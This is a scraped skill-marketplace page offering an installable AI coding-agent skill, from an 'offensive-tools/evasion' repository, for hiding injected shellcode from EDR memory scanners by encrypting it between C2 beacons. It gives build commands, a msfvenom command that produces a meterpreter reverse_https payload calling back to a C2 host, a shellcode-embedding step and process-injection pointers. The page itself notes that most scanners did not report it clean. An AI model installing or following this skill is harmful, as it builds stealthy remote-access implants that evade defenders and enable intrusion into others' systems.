offensive-tools/evasion/nim-shellcode-fluctuation/SKILL.md
Nim port of shellcode fluctuation — encrypts injected shellcode in memory between executions to evade memory scanners. Use when deploying implants that must hide from EDR in-memory scanning of RWX regions.
npx skillsauth add aeondave/malskill nim-shellcode-fluctuationInstall this skill globally with one command. Works with Claude Code, Cursor, and Windsurf.
3 of 9 scanners reported clean
Some scanners were skipped, did not run, or reported a non-clean status. Review each row below.
Memory evasion — encrypts shellcode (XOR/RC4) in RX pages between C2 callbacks.
# Install Nim
# nimble install winim
# Build
nim c -d:release -d:strip --opt:size -o:agent.exe fluctuation.nim
# Inject shellcode (embed in source)
# Replace SHELLCODE placeholder in nim source with msfvenom/Cobalt output
const SLEEP_MS = 5000 # Sleep between beacons
const XOR_KEY = 0x41 # Encryption key byte
const FLUCTUATE = true # Enable/disable fluctuation
Generate shellcode and embed:
msfvenom -p windows/x64/meterpreter/reverse_https LHOST=C2 LPORT=443 -f raw -o shell.bin
# Base64-encode and embed in nim source
python3 -c "import base64; print(base64.b64encode(open('shell.bin','rb').read()).decode())"
Combine with process injection:
# Use createRemoteThread or QueueUserAPC for injection
# then enable fluctuation in the injected thread
| File | When to load |
|------|--------------|
| references/ | APC injection variants and EDR bypass notes |
development
Auth/lab ref: Unicorn Engine CPU-only emulation for shellcode, decryptors, custom VM handlers, instruction tracing, memory hooks, and register-level experiments.
development
Auth/lab ref: Renode board and SoC simulation for MCU/RTOS firmware, UART/GPIO/peripheral modeling, GDB remote debugging, REPL platforms, and RESC scripts.
development
Auth/lab ref: Qiling OS-layer binary emulation for PE/ELF/Mach-O/UEFI/shellcode with rootfs, syscall/API hooks, filesystem mapping, and runtime patching.
databases
Auth/lab ref: QEMU user-mode and full-system emulation for cross-arch binaries, firmware, kernels, disks, serial consoles, networking, and GDB stubs.